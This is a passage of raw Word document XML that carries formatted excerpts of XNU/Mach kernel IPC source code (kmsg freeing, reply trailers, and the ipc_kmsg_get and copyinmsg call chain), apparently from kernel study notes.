          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  of the message.  The reply port right is moved</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  to the reply message, and we have deallocated</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  the destination port right, so we just need</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  to free the kmsg.</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kmsg_free</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The message contents of the request are intact.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  Destroy everthing except the reply port right,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  which is needed in the reply message.</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t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request</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local_por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CH_PORT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ipc_kmsg_destroy</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request</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k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IG_NO_REPLY</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The server function will send a reply message</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  using the reply port right, which it has saved.</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kmsg_free</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turn</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IKM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else</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if</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IP_VALID</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_port_t</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remote_port</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  Can't queue the reply message if the destination</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  (the reply port) isn't valid.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         */</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kmsg_destroy</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turn</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IKM_NULL</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lastRenderedPageBreak/>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>traile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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_msg_format_0_trailer_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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm_offset_t</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reply</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ikm_header</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trailer</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_sender</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KERNEL_SECURITY_TOKEN</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trailer</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_trailer_typ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CH_MSG_TRAILER_FORMAT_0</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trailer</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_trailer_size</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSG_TRAILER_MINIMUM_SIZE</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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reply</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C06B3" w:rsidRPr="00916E6C" w:rsidRDefault="000C06B3" w:rsidP="00916E6C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00916E6C" w:rsidRDefault="00B1522D" w:rsidP="005E36D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc445313350"/>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(kernel)</w:t>
      </w:r>
      <w:r w:rsidR="00916E6C" w:rsidRPr="00B1522D">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00916E6C" w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pc_kmsg_get</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="00B1522D">
      <w:r>
        <w:t>Ipc_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kmsg_get</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="00B1522D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>copyinmsg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="00B1522D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>copyio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRPr="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="00B1522D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A1069A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_bcopy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916E6C" w:rsidRPr="00916E6C" w:rsidRDefault="00916E6C" w:rsidP="00916E6C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_msg_return_t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916E6C" w:rsidRPr="00916E6C" w:rsidRDefault="00916E6C" w:rsidP="00916E6C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kmsg_get</w:t>
      </w:r>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916E6C" w:rsidRPr="00916E6C" w:rsidRDefault="00916E6C" w:rsidP="00916E6C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    mach_vm_address_t   msg_addr</w:t>
      </w:r>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916E6C" w:rsidRPr="00916E6C" w:rsidRDefault="00916E6C" w:rsidP="00916E6C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    mach_msg_size_t size</w:t>
      </w:r>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916E6C" w:rsidRPr="00916E6C" w:rsidRDefault="00916E6C" w:rsidP="00916E6C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ipc_kmsg_t      </w:t>
      </w:r>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kmsgp</w:t>
      </w:r>
      <w:r w:rsidRPr="00916E6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA005E" w:rsidRPr="00B1522D" w:rsidRDefault="00CA005E" w:rsidP="00CA005E">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRPr="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="00B1522D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRPr="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="00B1522D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1522D" w:rsidRPr="00B1522D" w:rsidRDefault="00B1522D" w:rsidP="00B1522D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>copyinmsg</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user_addr_t user_addr</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w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
